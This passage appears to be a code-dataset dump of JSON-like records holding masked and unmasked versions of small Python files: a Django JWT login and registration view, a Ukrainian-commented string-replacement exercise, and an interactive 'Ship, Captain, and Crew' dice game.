"step-4": "<mask token>\n\n\n@method_decorator(login_decorator, name='list')\nclass UsersOptionsView(GenericViewSet, mixins.ListModelMixin):\n \"\"\"\n list:\n 返回用户列表\n \"\"\"\n serializer_class = ApiUserSerializer\n queryset = User.objects.filter(is_superuser=0, is_active=1).all()\n\n def list(self, request, *args, **kwargs):\n return StatusResponse(data=super().list(request).data)\n\n\nclass UserLoginView(GenericAPIView):\n\n def _generate_tokens(self, user_id, with_refresh_token=True):\n \"\"\"\n 生成token 和refresh_token\n :param user_id: 用户id\n :return: token, refresh_token\n \"\"\"\n now = datetime.utcnow()\n expiry = now + timedelta(hours=float(os.environ['JWT_EXPIRY_HOURS']))\n token = generate_jwt({'user_id': user_id, 'refresh': False}, expiry)\n refresh_token = None\n if with_refresh_token:\n refresh_expiry = now + timedelta(days=float(os.environ[\n 'JWT_REFRESH_DAYS']))\n refresh_token = generate_jwt({'user_id': user_id, 'refresh': \n True}, refresh_expiry)\n return token, refresh_token\n\n def post(self, request):\n username = request.data.get('username')\n password = request.data.get('password')\n try:\n user = User.objects.get(username=username)\n except User.DoesNotExist as e:\n return StatusResponse(http_code=400, data={'tip': '用户不存在'})\n if user is not None and user.check_password(password):\n token, refresh_token = self._generate_tokens(user.id,\n with_refresh_token=True)\n data = {'token': token, 'refresh_token': refresh_token, 'id':\n user.id, 'username': user.username}\n response = StatusResponse(data=data, http_code=201)\n return response\n return StatusResponse(http_code=400, data={'tip': '登录失败'})\n\n def put(self, request):\n if request.user_id and request.refresh:\n token, refresh_token = self._generate_tokens(request.user_id,\n with_refresh_token=False)\n data = {'id': request.user_id, 'token': token}\n response = StatusResponse(data=data, http_code=201)\n return response\n else:\n return StatusResponse(http_code=401, data={'tip': 
'token刷新失败'})\n\n\nclass UserRegistView(GenericAPIView):\n serializer_class = UserSerializer\n\n def post(self, request):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return StatusResponse(http_code=200, data=serializer.data)\n",
"step-5": "import os\r\nfrom datetime import datetime, timedelta\r\n\r\nfrom django.shortcuts import render\r\nfrom django.utils.decorators import method_decorator\r\nfrom rest_framework.viewsets import GenericViewSet, mixins\r\n\r\nfrom common.jwt_util import generate_jwt\r\nfrom .serializers import ApiUser, ApiUserSerializer, UserSerializer\r\nfrom common.myresponse import StatusResponse\r\nfrom rest_framework.generics import GenericAPIView\r\nfrom .models import User\r\nfrom common.utils.login_util import login_decorator\r\n\r\n\r\n# Create your views here.\r\n\r\n@method_decorator(login_decorator,name=\"list\")\r\nclass UsersOptionsView(GenericViewSet, mixins.ListModelMixin):\r\n \"\"\"\r\n list:\r\n 返回用户列表\r\n \"\"\"\r\n serializer_class = ApiUserSerializer\r\n queryset = User.objects.filter(is_superuser=0,is_active=1).all()\r\n\r\n def list(self, request, *args, **kwargs):\r\n return StatusResponse(data=super().list(request).data)\r\n\r\n\r\n\r\nclass UserLoginView(GenericAPIView):\r\n def _generate_tokens(self, user_id, with_refresh_token=True):\r\n \"\"\"\r\n 生成token 和refresh_token\r\n :param user_id: 用户id\r\n :return: token, refresh_token\r\n \"\"\"\r\n # 颁发JWT\r\n now = datetime.utcnow()\r\n expiry = now + timedelta(hours=float(os.environ['JWT_EXPIRY_HOURS']))\r\n token = generate_jwt({'user_id': user_id, 'refresh': False}, expiry)\r\n\r\n refresh_token = None\r\n if with_refresh_token:\r\n refresh_expiry = now + timedelta(days=float(os.environ['JWT_REFRESH_DAYS']))\r\n refresh_token = generate_jwt({'user_id': user_id, 'refresh': True}, refresh_expiry)\r\n return token, refresh_token\r\n\r\n def post(self, request):\r\n\r\n username = request.data.get(\"username\")\r\n password = request.data.get(\"password\")\r\n try:\r\n user = User.objects.get(username=username)\r\n except User.DoesNotExist as e:\r\n return StatusResponse(http_code=400,data={\"tip\": \"用户不存在\"})\r\n\r\n if user is not None and user.check_password(password):\r\n token, refresh_token = 
self._generate_tokens(user.id, with_refresh_token=True)\r\n data = {\r\n \"token\": token,\r\n \"refresh_token\": refresh_token,\r\n \"id\": user.id,\r\n \"username\": user.username\r\n }\r\n response = StatusResponse(data=data, http_code=201)\r\n return response\r\n return StatusResponse(http_code=400,data={\"tip\":\"登录失败\"})\r\n def put(self,request):\r\n if request.user_id and request.refresh:\r\n token,refresh_token = self._generate_tokens(request.user_id, with_refresh_token=False)\r\n data ={\r\n \"id\":request.user_id,\r\n \"token\":token\r\n }\r\n response = StatusResponse(data=data, http_code=201)\r\n return response\r\n else:\r\n return StatusResponse(http_code=401, data={\"tip\": \"token刷新失败\"})\r\n\r\nclass UserRegistView(GenericAPIView):\r\n serializer_class = UserSerializer\r\n def post(self, request):\r\n serializer = self.get_serializer(data=request.data)\r\n serializer.is_valid(raise_exception=True)\r\n serializer.save()\r\n return StatusResponse(http_code=200,data=serializer.data)\r\n",
"step-ids": [
7,
8,
10,
11,
13
]
}
|
[
7,
8,
10,
11,
13
] |
'''
Функція replace() може використовуватися для заміни будь-якого слова у рядку іншим словом.
Прочитайте кожен рядок зі створеного у попередньому завданні файлу learning_python.txt і замініть слово Python назвою іншої мови,
наприклад C при виведенні на екран. Це завдання написати в окремій функції.
'''
def reader():
with open('possibilities.txt', 'r') as file1:
file_lines = [x.strip() for x in file1.readlines()]
for e in file_lines:
n = e.replace('Python', 'C++')
print(n)
if __name__ == '__main__':
reader()
|
normal
|
{
"blob_id": "6d80a89a47b68fd8d81739787897355671ca94e9",
"index": 5815,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef reader():\n with open('possibilities.txt', 'r') as file1:\n file_lines = [x.strip() for x in file1.readlines()]\n for e in file_lines:\n n = e.replace('Python', 'C++')\n print(n)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef reader():\n with open('possibilities.txt', 'r') as file1:\n file_lines = [x.strip() for x in file1.readlines()]\n for e in file_lines:\n n = e.replace('Python', 'C++')\n print(n)\n\n\nif __name__ == '__main__':\n reader()\n",
"step-4": "'''\nФункція replace() може використовуватися для заміни будь-якого слова у рядку іншим словом.\nПрочитайте кожен рядок зі створеного у попередньому завданні файлу learning_python.txt і замініть слово Python назвою іншої мови,\nнаприклад C при виведенні на екран. Це завдання написати в окремій функції.\n'''\n\n\ndef reader():\n with open('possibilities.txt', 'r') as file1:\n file_lines = [x.strip() for x in file1.readlines()]\n for e in file_lines:\n n = e.replace('Python', 'C++')\n print(n)\n\n\nif __name__ == '__main__':\n reader()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def multi():
scc = [6, 5, 4]
sc = [6, 5]
cc = [5, 4]
crew = [4]
captain = [5]
ship = [6]
n = 0
while n <= 2:
inp = input('Hit enter to roll')
if inp == '':
roll5 = random.choices(range(1, 7), k=5)
print(roll5)
if set(scc).issubset(roll5):
result_scc = [i for i in roll5 if not i in scc or scc.remove(i)
]
total_scc = sum(result_scc)
inp_scc = input(
'Do you wish to keep one, both, or neither of the remaining dice? '
)
if inp_scc == 'both':
print('Total score: ' + str(total_scc) + '.')
if inp_scc == 'neither':
roll2_scc = random.choices(range(1, 7), k=2)
print(roll2_scc)
inp_scc_none = input(
'Do you wish to keep one, both, or neither of the remaining dice? '
)
if inp_scc_none == 'both':
total_scc_none = sum(roll2_scc)
print('Total score: ' + str(total_scc_none) + '.')
if inp_scc_none == 'neither':
roll2_scc_none = random.choices(range(1, 7), k=2)
total_scc_none2 = sum(roll2_scc_none)
print(roll2_scc_none)
print('Your total score is: ' + str(total_scc_none2
) + '.')
if inp_scc_none == 'one':
inp_scc_none_one = input(
'Which die do you want to keep? ')
roll1_scc_none_one = random.randint(1, 6)
total_scc_none_one = roll1_scc_none_one + int(
inp_scc_none_one)
print(roll1_scc_none_one)
print('Your total score is: ' + str(
total_scc_none_one) + '.')
if inp_scc == 'one':
inp_scc_one = input('Which die do you want to keep? ')
roll1_scc_one = random.randint(1, 6)
print(roll1_scc_one)
total_scc_one = roll1_scc_one + int(inp_scc_one)
inp_scc_one2 = input(
"Hit enter to roll again or type 'pass' to keep your score "
)
if inp_scc_one2 == 'pass':
print('Your total score is: ' + str(total_scc_one) +
'.')
if inp_scc_one2 == '':
roll1_scc_one2 = random.randint(1, 6)
print(roll1_scc_one2)
total_scc_one2 = roll1_scc_one2 + int(inp_scc_one)
print('Your total score is: ' + str(total_scc_one2) +
'.')
if set(sc).issubset(roll5):
inp_sc = input(
'Now you need a 4(the Crew). Hit enter to roll the remaining dice'
)
if inp_sc == '':
roll3 = random.choices(range(1, 7), k=3)
print(roll3)
if set(crew).issubset(roll3):
result_crew = [i for i in roll3 if not i in crew or
crew.remove(i)]
total_crew = sum(result_crew)
inp_crew = input(
'Do you wish to keep one, both, or neither of the remaining dice? '
)
if inp_crew == 'both':
print('Total score: ' + str(total_crew) + '.')
if inp_crew == 'neither':
roll2_crew = random.choices(range(1, 7), k=2)
print(roll2_crew)
total_crew_none = sum(roll2_crew)
print('Your total score is: ' + str(
total_crew_none) + '.')
if inp_crew == 'one':
inp_crew_one = input(
'Which die do you want to keep? ')
roll1_crew_one = random.randint(1, 6)
print(roll1_crew_one)
total_crew_one = roll1_crew_one + int(inp_crew_one)
print('Your total score is: ' + str(
total_crew_one) + '.')
else:
inp_sc3 = input('Still no 4. Hit enter to roll again')
if inp_sc3 == '':
roll3_sc3 = random.choices(range(1, 7), k=3)
print(roll3_sc3)
if set(crew).issubset(roll3_sc3):
result_crew_sc3 = [i for i in roll3_sc3 if
not i in crew or crew.remove(i)]
total_crew_sc3 = sum(result_crew_sc3)
print('Your total score is: ' + str(
total_crew_sc3) + '.')
else:
print(
"Sorry, you get no points because the Ship, Captain, and Crew wasn't completed."
)
if set(ship).issubset(roll5) and 5 not in roll5 and n < 2:
inp_ship = input(
'Now you need a 5(the Captain) and a 4(the Crew). Hit enter to roll the remaining dice '
)
if inp_ship == '':
roll4_ship = random.choices(range(1, 7), k=4)
print(roll4_ship)
if set(cc).issubset(roll4_ship):
result_ship_cc = [i for i in roll4_ship if not i in
cc or cc.remove(i)]
total_ship_cc = sum(result_ship_cc)
inp_ship_cc = input(
'Do you wish to keep one, both, or neither of the remaining dice? '
)
if inp_ship_cc == 'both':
print('Your total is: ' + str(total_ship_cc) + '.')
if inp_ship_cc == 'neither':
roll2_cc = random.choices(range(1, 7), k=2)
print(roll2_cc)
total_ship_cc_none = sum(roll2_cc)
print('Your total score is: ' + str(
total_ship_cc_none) + '.')
if inp_ship_cc == 'one':
inp_ship_cc_one = input(
'Which die do you want to keep? ')
roll1_ship_cc_one = random.randint(1, 6)
print(roll1_ship_cc_one)
total_ship_cc_one = roll1_ship_cc_one + int(
inp_ship_cc_one)
print('Your total score is: ' + str(
total_ship_cc_one) + '.')
if set(captain).issubset(roll4_ship):
roll3_captain = random.choices(range(1, 7), k=3)
print(roll3_captain)
if set(crew).issubset(roll3_captain):
result_ship_captain = [i for i in roll3_captain if
not i in crew or crew.remove(i)]
total_ship_captain = sum(result_ship_captain)
print('Your total score is: ' + str(
total_ship_captain) + '.')
else:
print(
"Sorry, you get no points because the Ship, Captain, and Crew wasn't completed."
)
else:
n = n + 1
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def multi():
scc = [6, 5, 4]
sc = [6, 5]
cc = [5, 4]
crew = [4]
captain = [5]
ship = [6]
n = 0
while n <= 2:
inp = input('Hit enter to roll')
if inp == '':
roll5 = random.choices(range(1, 7), k=5)
print(roll5)
if set(scc).issubset(roll5):
result_scc = [i for i in roll5 if not i in scc or scc.remove(i)
]
total_scc = sum(result_scc)
inp_scc = input(
'Do you wish to keep one, both, or neither of the remaining dice? '
)
if inp_scc == 'both':
print('Total score: ' + str(total_scc) + '.')
if inp_scc == 'neither':
roll2_scc = random.choices(range(1, 7), k=2)
print(roll2_scc)
inp_scc_none = input(
'Do you wish to keep one, both, or neither of the remaining dice? '
)
if inp_scc_none == 'both':
total_scc_none = sum(roll2_scc)
print('Total score: ' + str(total_scc_none) + '.')
if inp_scc_none == 'neither':
roll2_scc_none = random.choices(range(1, 7), k=2)
total_scc_none2 = sum(roll2_scc_none)
print(roll2_scc_none)
print('Your total score is: ' + str(total_scc_none2
) + '.')
if inp_scc_none == 'one':
inp_scc_none_one = input(
'Which die do you want to keep? ')
roll1_scc_none_one = random.randint(1, 6)
total_scc_none_one = roll1_scc_none_one + int(
inp_scc_none_one)
print(roll1_scc_none_one)
print('Your total score is: ' + str(
total_scc_none_one) + '.')
if inp_scc == 'one':
inp_scc_one = input('Which die do you want to keep? ')
roll1_scc_one = random.randint(1, 6)
print(roll1_scc_one)
total_scc_one = roll1_scc_one + int(inp_scc_one)
inp_scc_one2 = input(
"Hit enter to roll again or type 'pass' to keep your score "
)
if inp_scc_one2 == 'pass':
print('Your total score is: ' + str(total_scc_one) +
'.')
if inp_scc_one2 == '':
roll1_scc_one2 = random.randint(1, 6)
print(roll1_scc_one2)
total_scc_one2 = roll1_scc_one2 + int(inp_scc_one)
print('Your total score is: ' + str(total_scc_one2) +
'.')
if set(sc).issubset(roll5):
inp_sc = input(
'Now you need a 4(the Crew). Hit enter to roll the remaining dice'
)
if inp_sc == '':
roll3 = random.choices(range(1, 7), k=3)
print(roll3)
if set(crew).issubset(roll3):
result_crew = [i for i in roll3 if not i in crew or
crew.remove(i)]
total_crew = sum(result_crew)
inp_crew = input(
'Do you wish to keep one, both, or neither of the remaining dice? '
)
if inp_crew == 'both':
print('Total score: ' + str(total_crew) + '.')
if inp_crew == 'neither':
roll2_crew = random.choices(range(1, 7), k=2)
print(roll2_crew)
total_crew_none = sum(roll2_crew)
print('Your total score is: ' + str(
total_crew_none) + '.')
if inp_crew == 'one':
inp_crew_one = input(
'Which die do you want to keep? ')
roll1_crew_one = random.randint(1, 6)
print(roll1_crew_one)
total_crew_one = roll1_crew_one + int(inp_crew_one)
print('Your total score is: ' + str(
total_crew_one) + '.')
else:
inp_sc3 = input('Still no 4. Hit enter to roll again')
if inp_sc3 == '':
roll3_sc3 = random.choices(range(1, 7), k=3)
print(roll3_sc3)
if set(crew).issubset(roll3_sc3):
result_crew_sc3 = [i for i in roll3_sc3 if
not i in crew or crew.remove(i)]
total_crew_sc3 = sum(result_crew_sc3)
print('Your total score is: ' + str(
total_crew_sc3) + '.')
else:
print(
"Sorry, you get no points because the Ship, Captain, and Crew wasn't completed."
)
if set(ship).issubset(roll5) and 5 not in roll5 and n < 2:
inp_ship = input(
'Now you need a 5(the Captain) and a 4(the Crew). Hit enter to roll the remaining dice '
)
if inp_ship == '':
roll4_ship = random.choices(range(1, 7), k=4)
print(roll4_ship)
if set(cc).issubset(roll4_ship):
result_ship_cc = [i for i in roll4_ship if not i in
cc or cc.remove(i)]
total_ship_cc = sum(result_ship_cc)
inp_ship_cc = input(
'Do you wish to keep one, both, or neither of the remaining dice? '
)
if inp_ship_cc == 'both':
print('Your total is: ' + str(total_ship_cc) + '.')
if inp_ship_cc == 'neither':
roll2_cc = random.choices(range(1, 7), k=2)
print(roll2_cc)
total_ship_cc_none = sum(roll2_cc)
print('Your total score is: ' + str(
total_ship_cc_none) + '.')
if inp_ship_cc == 'one':
inp_ship_cc_one = input(
'Which die do you want to keep? ')
roll1_ship_cc_one = random.randint(1, 6)
print(roll1_ship_cc_one)
total_ship_cc_one = roll1_ship_cc_one + int(
inp_ship_cc_one)
print('Your total score is: ' + str(
total_ship_cc_one) + '.')
if set(captain).issubset(roll4_ship):
roll3_captain = random.choices(range(1, 7), k=3)
print(roll3_captain)
if set(crew).issubset(roll3_captain):
result_ship_captain = [i for i in roll3_captain if
not i in crew or crew.remove(i)]
total_ship_captain = sum(result_ship_captain)
print('Your total score is: ' + str(
total_ship_captain) + '.')
else:
print(
"Sorry, you get no points because the Ship, Captain, and Crew wasn't completed."
)
else:
n = n + 1
<|reserved_special_token_0|>
for i in players:
multi()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def multi():
scc = [6, 5, 4]
sc = [6, 5]
cc = [5, 4]
crew = [4]
captain = [5]
ship = [6]
n = 0
while n <= 2:
inp = input('Hit enter to roll')
if inp == '':
roll5 = random.choices(range(1, 7), k=5)
print(roll5)
if set(scc).issubset(roll5):
result_scc = [i for i in roll5 if not i in scc or scc.remove(i)
]
total_scc = sum(result_scc)
inp_scc = input(
'Do you wish to keep one, both, or neither of the remaining dice? '
)
if inp_scc == 'both':
print('Total score: ' + str(total_scc) + '.')
if inp_scc == 'neither':
roll2_scc = random.choices(range(1, 7), k=2)
print(roll2_scc)
inp_scc_none = input(
'Do you wish to keep one, both, or neither of the remaining dice? '
)
if inp_scc_none == 'both':
total_scc_none = sum(roll2_scc)
print('Total score: ' + str(total_scc_none) + '.')
if inp_scc_none == 'neither':
roll2_scc_none = random.choices(range(1, 7), k=2)
total_scc_none2 = sum(roll2_scc_none)
print(roll2_scc_none)
print('Your total score is: ' + str(total_scc_none2
) + '.')
if inp_scc_none == 'one':
inp_scc_none_one = input(
'Which die do you want to keep? ')
roll1_scc_none_one = random.randint(1, 6)
total_scc_none_one = roll1_scc_none_one + int(
inp_scc_none_one)
print(roll1_scc_none_one)
print('Your total score is: ' + str(
total_scc_none_one) + '.')
if inp_scc == 'one':
inp_scc_one = input('Which die do you want to keep? ')
roll1_scc_one = random.randint(1, 6)
print(roll1_scc_one)
total_scc_one = roll1_scc_one + int(inp_scc_one)
inp_scc_one2 = input(
"Hit enter to roll again or type 'pass' to keep your score "
)
if inp_scc_one2 == 'pass':
print('Your total score is: ' + str(total_scc_one) +
'.')
if inp_scc_one2 == '':
roll1_scc_one2 = random.randint(1, 6)
print(roll1_scc_one2)
total_scc_one2 = roll1_scc_one2 + int(inp_scc_one)
print('Your total score is: ' + str(total_scc_one2) +
'.')
if set(sc).issubset(roll5):
inp_sc = input(
'Now you need a 4(the Crew). Hit enter to roll the remaining dice'
)
if inp_sc == '':
roll3 = random.choices(range(1, 7), k=3)
print(roll3)
if set(crew).issubset(roll3):
result_crew = [i for i in roll3 if not i in crew or
crew.remove(i)]
total_crew = sum(result_crew)
inp_crew = input(
'Do you wish to keep one, both, or neither of the remaining dice? '
)
if inp_crew == 'both':
print('Total score: ' + str(total_crew) + '.')
if inp_crew == 'neither':
roll2_crew = random.choices(range(1, 7), k=2)
print(roll2_crew)
total_crew_none = sum(roll2_crew)
print('Your total score is: ' + str(
total_crew_none) + '.')
if inp_crew == 'one':
inp_crew_one = input(
'Which die do you want to keep? ')
roll1_crew_one = random.randint(1, 6)
print(roll1_crew_one)
total_crew_one = roll1_crew_one + int(inp_crew_one)
print('Your total score is: ' + str(
total_crew_one) + '.')
else:
inp_sc3 = input('Still no 4. Hit enter to roll again')
if inp_sc3 == '':
roll3_sc3 = random.choices(range(1, 7), k=3)
print(roll3_sc3)
if set(crew).issubset(roll3_sc3):
result_crew_sc3 = [i for i in roll3_sc3 if
not i in crew or crew.remove(i)]
total_crew_sc3 = sum(result_crew_sc3)
print('Your total score is: ' + str(
total_crew_sc3) + '.')
else:
print(
"Sorry, you get no points because the Ship, Captain, and Crew wasn't completed."
)
if set(ship).issubset(roll5) and 5 not in roll5 and n < 2:
inp_ship = input(
'Now you need a 5(the Captain) and a 4(the Crew). Hit enter to roll the remaining dice '
)
if inp_ship == '':
roll4_ship = random.choices(range(1, 7), k=4)
print(roll4_ship)
if set(cc).issubset(roll4_ship):
result_ship_cc = [i for i in roll4_ship if not i in
cc or cc.remove(i)]
total_ship_cc = sum(result_ship_cc)
inp_ship_cc = input(
'Do you wish to keep one, both, or neither of the remaining dice? '
)
if inp_ship_cc == 'both':
print('Your total is: ' + str(total_ship_cc) + '.')
if inp_ship_cc == 'neither':
roll2_cc = random.choices(range(1, 7), k=2)
print(roll2_cc)
total_ship_cc_none = sum(roll2_cc)
print('Your total score is: ' + str(
total_ship_cc_none) + '.')
if inp_ship_cc == 'one':
inp_ship_cc_one = input(
'Which die do you want to keep? ')
roll1_ship_cc_one = random.randint(1, 6)
print(roll1_ship_cc_one)
total_ship_cc_one = roll1_ship_cc_one + int(
inp_ship_cc_one)
print('Your total score is: ' + str(
total_ship_cc_one) + '.')
if set(captain).issubset(roll4_ship):
roll3_captain = random.choices(range(1, 7), k=3)
print(roll3_captain)
if set(crew).issubset(roll3_captain):
result_ship_captain = [i for i in roll3_captain if
not i in crew or crew.remove(i)]
total_ship_captain = sum(result_ship_captain)
print('Your total score is: ' + str(
total_ship_captain) + '.')
else:
print(
"Sorry, you get no points because the Ship, Captain, and Crew wasn't completed."
)
else:
n = n + 1
inp = input('How many players are there? ')
players = range(int(inp))
roll_dict = dict()
for i in players:
multi()
<|reserved_special_token_1|>
import random
def multi():
    """Play one interactive round of the dice game Ship, Captain, and Crew.

    The player rolls five dice trying to collect a 6 (the Ship), a 5 (the
    Captain) and a 4 (the Crew); the leftover dice are the scoring cargo.
    All interaction goes through input()/print(); nothing is returned.

    NOTE(review): comprehensions of the shape
    ``[i for i in roll if not i in target or target.remove(i)]`` rely on
    ``list.remove`` returning None (falsy) to drop exactly one matching die,
    and they mutate ``scc``/``crew``/``cc`` in place — a later pass through
    the ``while`` loop therefore sees already-emptied target lists.  Confirm
    this is intended before relying on multi-roll behaviour.
    """
    # Target combinations still required at each stage of the game.
    scc = [6, 5, 4]
    sc = [6, 5]
    cc = [5, 4]
    crew = [4]
    captain = [5]
    ship = [6]
    # Number of refused prompts so far; the loop allows at most three.
    n = 0
    while n <= 2:
        inp = input('Hit enter to roll')
        if inp == '':
            # Opening roll of all five six-sided dice.
            roll5 = random.choices(range(1, 7), k=5)
            print(roll5)
            # Branch 1: 6, 5 and 4 all appear on the first roll.
            if set(scc).issubset(roll5):
                # Drop one 6, one 5 and one 4; the two leftovers are cargo.
                result_scc = [i for i in roll5 if not i in scc or scc.remove(i)
                    ]
                total_scc = sum(result_scc)
                inp_scc = input(
                    'Do you wish to keep one, both, or neither of the remaining dice? '
                    )
                if inp_scc == 'both':
                    print('Total score: ' + str(total_scc) + '.')
                if inp_scc == 'neither':
                    # Re-roll both cargo dice.
                    roll2_scc = random.choices(range(1, 7), k=2)
                    print(roll2_scc)
                    inp_scc_none = input(
                        'Do you wish to keep one, both, or neither of the remaining dice? '
                        )
                    if inp_scc_none == 'both':
                        total_scc_none = sum(roll2_scc)
                        print('Total score: ' + str(total_scc_none) + '.')
                    if inp_scc_none == 'neither':
                        # Second (final) cargo re-roll.
                        roll2_scc_none = random.choices(range(1, 7), k=2)
                        total_scc_none2 = sum(roll2_scc_none)
                        print(roll2_scc_none)
                        print('Your total score is: ' + str(total_scc_none2
                            ) + '.')
                    if inp_scc_none == 'one':
                        # Keep one die (value typed by the player), re-roll the other.
                        inp_scc_none_one = input(
                            'Which die do you want to keep? ')
                        roll1_scc_none_one = random.randint(1, 6)
                        total_scc_none_one = roll1_scc_none_one + int(
                            inp_scc_none_one)
                        print(roll1_scc_none_one)
                        print('Your total score is: ' + str(
                            total_scc_none_one) + '.')
                if inp_scc == 'one':
                    inp_scc_one = input('Which die do you want to keep? ')
                    roll1_scc_one = random.randint(1, 6)
                    print(roll1_scc_one)
                    total_scc_one = roll1_scc_one + int(inp_scc_one)
                    inp_scc_one2 = input(
                        "Hit enter to roll again or type 'pass' to keep your score "
                        )
                    if inp_scc_one2 == 'pass':
                        print('Your total score is: ' + str(total_scc_one) +
                            '.')
                    if inp_scc_one2 == '':
                        roll1_scc_one2 = random.randint(1, 6)
                        print(roll1_scc_one2)
                        total_scc_one2 = roll1_scc_one2 + int(inp_scc_one)
                        print('Your total score is: ' + str(total_scc_one2) +
                            '.')
            # Branch 2: ship and captain found, still missing the crew (a 4).
            if set(sc).issubset(roll5):
                inp_sc = input(
                    'Now you need a 4(the Crew). Hit enter to roll the remaining dice'
                    )
                if inp_sc == '':
                    roll3 = random.choices(range(1, 7), k=3)
                    print(roll3)
                    if set(crew).issubset(roll3):
                        result_crew = [i for i in roll3 if not i in crew or
                            crew.remove(i)]
                        total_crew = sum(result_crew)
                        inp_crew = input(
                            'Do you wish to keep one, both, or neither of the remaining dice? '
                            )
                        if inp_crew == 'both':
                            print('Total score: ' + str(total_crew) + '.')
                        if inp_crew == 'neither':
                            roll2_crew = random.choices(range(1, 7), k=2)
                            print(roll2_crew)
                            total_crew_none = sum(roll2_crew)
                            print('Your total score is: ' + str(
                                total_crew_none) + '.')
                        if inp_crew == 'one':
                            inp_crew_one = input(
                                'Which die do you want to keep? ')
                            roll1_crew_one = random.randint(1, 6)
                            print(roll1_crew_one)
                            total_crew_one = roll1_crew_one + int(inp_crew_one)
                            print('Your total score is: ' + str(
                                total_crew_one) + '.')
                    else:
                        # Last chance to roll the missing 4.
                        inp_sc3 = input('Still no 4. Hit enter to roll again')
                        if inp_sc3 == '':
                            roll3_sc3 = random.choices(range(1, 7), k=3)
                            print(roll3_sc3)
                            if set(crew).issubset(roll3_sc3):
                                result_crew_sc3 = [i for i in roll3_sc3 if
                                    not i in crew or crew.remove(i)]
                                total_crew_sc3 = sum(result_crew_sc3)
                                print('Your total score is: ' + str(
                                    total_crew_sc3) + '.')
                            else:
                                print(
                                    "Sorry, you get no points because the Ship, Captain, and Crew wasn't completed."
                                    )
            # Branch 3: only the ship (a 6), no captain yet; the `n < 2`
            # guard leaves room for the extra rolls this path needs.
            if set(ship).issubset(roll5) and 5 not in roll5 and n < 2:
                inp_ship = input(
                    'Now you need a 5(the Captain) and a 4(the Crew). Hit enter to roll the remaining dice '
                    )
                if inp_ship == '':
                    roll4_ship = random.choices(range(1, 7), k=4)
                    print(roll4_ship)
                    if set(cc).issubset(roll4_ship):
                        result_ship_cc = [i for i in roll4_ship if not i in
                            cc or cc.remove(i)]
                        total_ship_cc = sum(result_ship_cc)
                        inp_ship_cc = input(
                            'Do you wish to keep one, both, or neither of the remaining dice? '
                            )
                        if inp_ship_cc == 'both':
                            print('Your total is: ' + str(total_ship_cc) + '.')
                        if inp_ship_cc == 'neither':
                            roll2_cc = random.choices(range(1, 7), k=2)
                            print(roll2_cc)
                            total_ship_cc_none = sum(roll2_cc)
                            print('Your total score is: ' + str(
                                total_ship_cc_none) + '.')
                        if inp_ship_cc == 'one':
                            inp_ship_cc_one = input(
                                'Which die do you want to keep? ')
                            roll1_ship_cc_one = random.randint(1, 6)
                            print(roll1_ship_cc_one)
                            total_ship_cc_one = roll1_ship_cc_one + int(
                                inp_ship_cc_one)
                            print('Your total score is: ' + str(
                                total_ship_cc_one) + '.')
                    # Captain found but not the crew: one more roll for the 4.
                    if set(captain).issubset(roll4_ship):
                        roll3_captain = random.choices(range(1, 7), k=3)
                        print(roll3_captain)
                        if set(crew).issubset(roll3_captain):
                            result_ship_captain = [i for i in roll3_captain if
                                not i in crew or crew.remove(i)]
                            total_ship_captain = sum(result_ship_captain)
                            print('Your total score is: ' + str(
                                total_ship_captain) + '.')
                        else:
                            print(
                                "Sorry, you get no points because the Ship, Captain, and Crew wasn't completed."
                                )
        else:
            # Any non-empty input counts as a refused roll.
            n = n + 1
# --- Script entry point -------------------------------------------------
# Ask how many people are playing, then run one interactive round of
# Ship, Captain, and Crew for each of them.
inp = input('How many players are there? ')
players = range(int(inp))
# NOTE(review): roll_dict is assigned but never read in sight — presumably
# a placeholder for per-player score tracking; confirm before removing.
roll_dict = {}
for _player in players:
    multi()
<|reserved_special_token_1|>
import random
def multi():
    """Play one interactive round of the dice game Ship, Captain, and Crew.

    The player rolls five dice trying to collect a 6 (the Ship), a 5 (the
    Captain) and a 4 (the Crew); the leftover dice are the scoring cargo.
    All interaction goes through input()/print(); nothing is returned.

    NOTE(review): comprehensions of the shape
    ``[i for i in roll if not i in target or target.remove(i)]`` rely on
    ``list.remove`` returning None (falsy) to drop exactly one matching die,
    and they mutate ``scc``/``crew``/``cc`` in place — a later pass through
    the ``while`` loop therefore sees already-emptied target lists.  Confirm
    this is intended before relying on multi-roll behaviour.
    """
    # Target combinations still required at each stage of the game.
    scc = [6, 5, 4]
    sc = [6, 5]
    cc = [5, 4]
    crew = [4]
    captain = [5]
    ship = [6]
    # Number of refused prompts so far; the loop allows at most three.
    n = 0
    while n <= 2:
        inp = input("Hit enter to roll")
        if inp == "":
            # Opening roll of all five six-sided dice.
            roll5 = random.choices(range(1, 7), k=5)
            print(roll5)
            # Branch 1: 6, 5 and 4 all appear on the first roll.
            if set(scc).issubset(roll5):
                # Drop one 6, one 5 and one 4; the two leftovers are cargo.
                result_scc = [i for i in roll5 if not i in scc or scc.remove(i)]
                total_scc = sum(result_scc)
                inp_scc = input("Do you wish to keep one, both, or neither of the remaining dice? ")
                if inp_scc == "both":
                    print("Total score: " + str(total_scc) + ".")
                if inp_scc == "neither":
                    # Re-roll both cargo dice.
                    roll2_scc = random.choices(range(1, 7), k=2)
                    print(roll2_scc)
                    inp_scc_none = input("Do you wish to keep one, both, or neither of the remaining dice? ")
                    if inp_scc_none == "both":
                        total_scc_none = sum(roll2_scc)
                        print("Total score: " + str(total_scc_none) + ".")
                    if inp_scc_none == "neither":
                        # Second (final) cargo re-roll.
                        roll2_scc_none = random.choices(range(1, 7), k=2)
                        total_scc_none2 = sum(roll2_scc_none)
                        print(roll2_scc_none)
                        print("Your total score is: " + str(total_scc_none2) + ".")
                    if inp_scc_none == "one":
                        # Keep one die (value typed by the player), re-roll the other.
                        inp_scc_none_one = input("Which die do you want to keep? ")
                        roll1_scc_none_one = random.randint(1, 6)
                        total_scc_none_one = roll1_scc_none_one + int(inp_scc_none_one)
                        print(roll1_scc_none_one)
                        print("Your total score is: " + str(total_scc_none_one) + ".")
                if inp_scc == "one":
                    inp_scc_one = input("Which die do you want to keep? ")
                    roll1_scc_one = random.randint(1, 6)
                    print(roll1_scc_one)
